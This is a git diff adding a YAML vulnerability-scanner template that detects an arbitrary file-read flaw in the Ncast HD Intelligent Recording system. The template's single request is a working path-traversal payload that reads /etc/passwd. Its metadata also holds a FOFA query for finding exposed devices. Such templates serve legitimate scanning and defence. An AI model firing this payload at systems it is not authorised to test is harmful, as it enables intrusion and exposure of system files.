diff --git a/http/vulnerabilities/other/ncast-lfi.yaml b/http/vulnerabilities/other/ncast-lfi.yaml new file mode 100644 index 0000000000..e63299e670 --- /dev/null +++ b/http/vulnerabilities/other/ncast-lfi.yaml @@ -0,0 +1,36 @@ +id: ncast-lfi + +info: + name: Ncast HD Intelligent Recording - Arbitrary File Reading + author: pussycat0x + severity: high + description: | + Ncast HD intelligent recording and broadcasting system has an arbitrary file reading vulnerability. + reference: + - https://github.com/wy876/POC/blob/main/Ncast%E9%AB%98%E6%B8%85%E6%99%BA%E8%83%BD%E5%BD%95%E6%92%AD%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + fofa-query: app="Ncast-产品" && title=="高清智能录播系统" + verified: true + max-request: 1 + tags: ncast,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/developLog/downloadLog.php?name=../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: content_type + words: + - "application/force-download" + + - type: status + status: + - 200